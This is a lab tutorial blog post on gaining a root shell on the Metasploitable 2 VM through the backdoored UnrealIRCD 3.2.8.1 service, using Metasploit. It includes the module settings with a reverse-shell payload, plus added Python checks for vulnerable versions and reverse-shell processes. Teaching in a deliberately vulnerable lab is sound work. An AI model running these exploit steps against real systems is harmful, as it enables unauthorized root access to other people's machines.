Metasploitable 2.0 Tutorial pt 3: Gaining Root from a Vulnerable Service

Friday, August 17, 2012

Dan Dieterle


Continuing our tutorial series on Metasploitable 2, the purposefully vulnerable virtual machine used to learn security techniques, this time we will look at how to get root access from a vulnerable service.

We saw in previous tutorials how to scan a system for open ports with Nmap, and how to use Metasploit’s built-in scanners to identify software revision levels.

I alluded to it earlier, so let’s take a look at UnrealIRCD, sitting on port 6667. I chose this service for a few reasons. First of all, there are numerous Metasploitable how-tos out there, but a lot of them focus on the standard services.

Secondly, in real life, which is the service that will most likely go unpatched? The main web server or some secondary service that was installed for a project and then forgotten about?

So let’s get started! From the Nmap scan we saw this output for Unreal ircd:

(screenshot)

Let’s take the version number and do a search to see if there are any vulnerabilities or exploits that we can take advantage of. We can search the web, or we can search inside Metasploit using the “search” command. Let’s look at both!

First a quick Google search for “Unreal3.2.8.1 exploit” returns this:

(screenshot)

Cute, this version of UnrealIRCD had a backdoor added to it. Well I think this is definitely worth trying, especially as it has an “Excellent” Metasploit rank, which basically means the exploit is very stable and works consistently.

The exploit to use is listed further down Metasploit’s webpage, but we could find it by using the “Search” command in the Metasploit Framework as below:

(screenshot)

As you can see there is only the one exploit in Metasploit for UnrealIRCD and it is the 3.2.8.1 backdoor exploit.
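The same version lookup is worth running from the defender’s side, since the forgotten secondary service is exactly what an inventory check should catch. Here is an added example, not from the original post and not a Metasploit module, that takes text in the layout of Nmap’s normal -sV output and flags any open service whose reported version is on a known-bad list. The only list entry is the UnrealIRCD 3.2.8.1 release discussed above; the scan lines, the table layout and the Finding record are constructed for the example, not a real scan.

```python
"""Flag scanned services whose reported version is on a known-bad list.

Added example, not from the original post and not a Metasploit module.
It parses lines in the shape of Nmap's normal (-sV) output and checks
each open service against a small table of vulnerable releases. Only the
UnrealIRCd 3.2.8.1 entry is taken from the post; the scan text below is
constructed sample input, not a real scan.
"""
import re
from dataclasses import dataclass

# Constructed sample in the layout of Nmap -sV normal output (not a real scan).
SAMPLE_SCAN = """\
PORT     STATE  SERVICE VERSION
22/tcp   open   ssh     OpenSSH 8.9p1 (protocol 2.0)
25/tcp   closed smtp
80/tcp   open   http    Apache httpd 2.4.52
6667/tcp open   irc     Unreal ircd 3.2.8.1
"""

# Assumed table layout: product keyword -> (bad versions, note).
# Only the UnrealIRCd entry comes from the post.
KNOWN_BAD = {
    "unreal ircd": (
        {"3.2.8.1"},
        "release shipped with a backdoor; a Metasploit exploit exists (rank Excellent)",
    ),
}

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
VERSION = re.compile(r"\d+(?:\.\d+)+")


@dataclass(frozen=True)
class Finding:
    port: int
    proto: str
    service: str
    banner: str
    version: str
    note: str


def parse_open_ports(text):
    """Yield (port, proto, service, banner) for every open port line."""
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # header, blank or unrelated line
        port, proto, state, service, banner = m.groups()
        if state == "open":
            yield int(port), proto, service, banner.strip()


def find_vulnerable(text):
    """Return Findings for open services whose version is in KNOWN_BAD."""
    findings = []
    for port, proto, service, banner in parse_open_ports(text):
        lowered = banner.lower()
        for product, (bad_versions, note) in KNOWN_BAD.items():
            if product not in lowered:
                continue
            vm = VERSION.search(banner)
            if vm and vm.group(0) in bad_versions:
                findings.append(Finding(port, proto, service, banner, vm.group(0), note))
    return findings


if __name__ == "__main__":
    hits = find_vulnerable(SAMPLE_SCAN)
    for f in hits:
        print(f"{f.port}/{f.proto} {f.service}: {f.banner} -> {f.note}")
    print("no known-bad versions found" if not hits else f"{len(hits)} finding(s)")
```

Feed it the saved output of a real scan (`nmap -sV -oN scan.txt <host>`) and grow the table from your patch tracker; the match is deliberately on the product keyword plus an exact version so that a patched 3.2.9 on the same port does not trip it.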

Excellent!

So, let’s “use” it and check the options:

(screenshot)

All it needs is the remote host address:

set RHOST 192.168.12.20 (Metasploitable’s IP address)

Don’t forget to choose a payload for the exploit:

(screenshot)

This command lists all the payloads that are compatible with this exploit. Unfortunately they are all command shells. A Meterpreter shell would be better than a command shell and give us more options, but for now we will just use the generic reverse shell. This will drop us right into a terminal shell on the target when the exploit finishes.

set PAYLOAD generic/shell_reverse_tcp

For this payload all we need to do is set the LHOST option (the IP of our BackTrack Metasploit system) and then do a final “show options” to make sure everything is set correctly:

(screenshot)

Our RHOST (target) and LHOST (attacker system that the shell will connect back to) values are correctly set.

We are golden, now just type “exploit”:

(screenshot)

Notice it says that a session is opened, but then it just gives you a blinking cursor. You are actually sitting in a terminal shell on the target machine. As you can see above, I typed “whoami” and the target system responded with “root”. The root user is the highest-level user on a Linux machine! It worked!

So to recap: we found an open service on the target machine, searched for and found an exploit that works on the software version present, and finally used the exploit to obtain a full remote shell.

All the standard Linux commands work in the shell we have. But if you poke around a little, you will find that you are in the /etc/unreal directory (use the “pwd” command), and it will not let you out of that directory. Odd, but don’t forget that we are the root user! We can make new users or do almost anything else that we want.
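Seen from the machine that was just compromised, two things are now visible on the host: a network daemon that was listening as root (which is the only reason “whoami” came back as root), and a shell process that owns a TCP socket to another machine, something no interactive shell normally does. Here is an added example, not part of the original post and not a Metasploit or UnrealIRCD tool, that checks for both conditions using text in the layout of `ps -eo pid,ppid,user,comm` and `ss -tnp`. The process table, the socket lines, the peer address 192.168.12.10 and port 4444 are all constructed sample data; only the target address 192.168.12.20 comes from the post.

```python
"""Spot a root-owned network daemon and a shell that holds a TCP socket.

Added example, not from the original post and not a Metasploit or
UnrealIRCd tool. Input is text in the layout of `ps -eo pid,ppid,user,comm`
and `ss -tnp`; both samples below are constructed. Only the host address
192.168.12.20 comes from the post; the peer 192.168.12.10, port 4444 and
all pids are made up for the example.
"""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid user comm")
Sock = namedtuple("Sock", "state local peer comm pid")

# Constructed process table (layout of `ps -eo pid,ppid,user,comm`).
PS_SAMPLE = """\
  PID  PPID USER     COMMAND
    1     0 root     init
 4211     1 root     ircd
 4377  4211 root     sh
 4390     1 root     sshd
 4402  4390 dan      bash
"""

# Constructed socket table (layout of `ss -tnp`).
SS_SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port    Peer Address:Port    Process
LISTEN 0      10     0.0.0.0:6667          0.0.0.0:*            users:(("ircd",pid=4211,fd=3))
ESTAB  0      0      192.168.12.20:42866   192.168.12.10:4444   users:(("sh",pid=4377,fd=0))
ESTAB  0      0      192.168.12.20:22      192.168.12.10:51230  users:(("sshd",pid=4390,fd=4))
"""

SHELLS = {"sh", "bash", "dash", "zsh"}
OWNER = re.compile(r'users:\(\("([^"]+)",pid=(\d+),fd=\d+\)\)')


def parse_ps(text):
    """Map pid -> Proc, skipping the header line."""
    procs = {}
    for line in text.splitlines():
        parts = line.split(None, 3)
        if len(parts) == 4 and parts[0].isdigit():
            pid, ppid, user, comm = parts
            procs[int(pid)] = Proc(int(pid), int(ppid), user, comm.strip())
    return procs


def parse_ss(text):
    """Return Sock records for LISTEN and ESTAB lines that name an owning process."""
    socks = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0] not in ("LISTEN", "ESTAB"):
            continue
        m = OWNER.search(line)
        if m:
            socks.append(Sock(parts[0], parts[3], parts[4], m.group(1), int(m.group(2))))
    return socks


def ancestry(procs, pid):
    """Command names from pid up to the root of the process tree."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid].comm)
        pid = procs[pid].ppid
    return chain


def audit(ps_text, ss_text):
    """Return (kind, pid, detail) tuples for the two conditions checked."""
    procs = parse_ps(ps_text)
    findings = []
    for s in parse_ss(ss_text):
        owner = procs.get(s.pid)
        if s.state == "LISTEN" and owner is not None and owner.user == "root":
            # Least-privilege gap: compromising this daemon means compromising root.
            findings.append(("root-daemon", s.pid, f"{s.comm} listens on {s.local} as root"))
        if s.state == "ESTAB" and s.comm in SHELLS:
            # A shell with a TCP socket as a file descriptor is the shape of a reverse shell.
            chain = " <- ".join(ancestry(procs, s.pid))
            findings.append(("reverse-shell", s.pid,
                             f"{s.comm} holds TCP socket {s.local} -> {s.peer}; ancestry: {chain}"))
    return findings


if __name__ == "__main__":
    for kind, pid, detail in audit(PS_SAMPLE, SS_SAMPLE):
        print(f"[{kind}] pid {pid}: {detail}")
```

The sshd connection and the interactive bash under it are left alone on purpose: sshd is not a shell, and the user’s bash talks to a pty, not a socket. The ancestry string is what turns an alert into a root cause, since “sh <- ircd <- init” points straight at the daemon that spawned the shell.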

In the next tutorial I will show you how to grab information from the Linux machine using our foothold that will allow us to access other existing accounts and further exploit the system.

Until next time!

Cross-posted from Cyber Arms

sam m: Thanks for this interesting tutorial.
I tried to do the same thing you did, but I get:
"Exploit completed, but no session was created"
What do you think the problem is?

I am using VirtualBox with two guest machines: BackTrack5 and Metasploitable.

Both VMs are connected with Host-only mode.

I appreciate your help.
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.
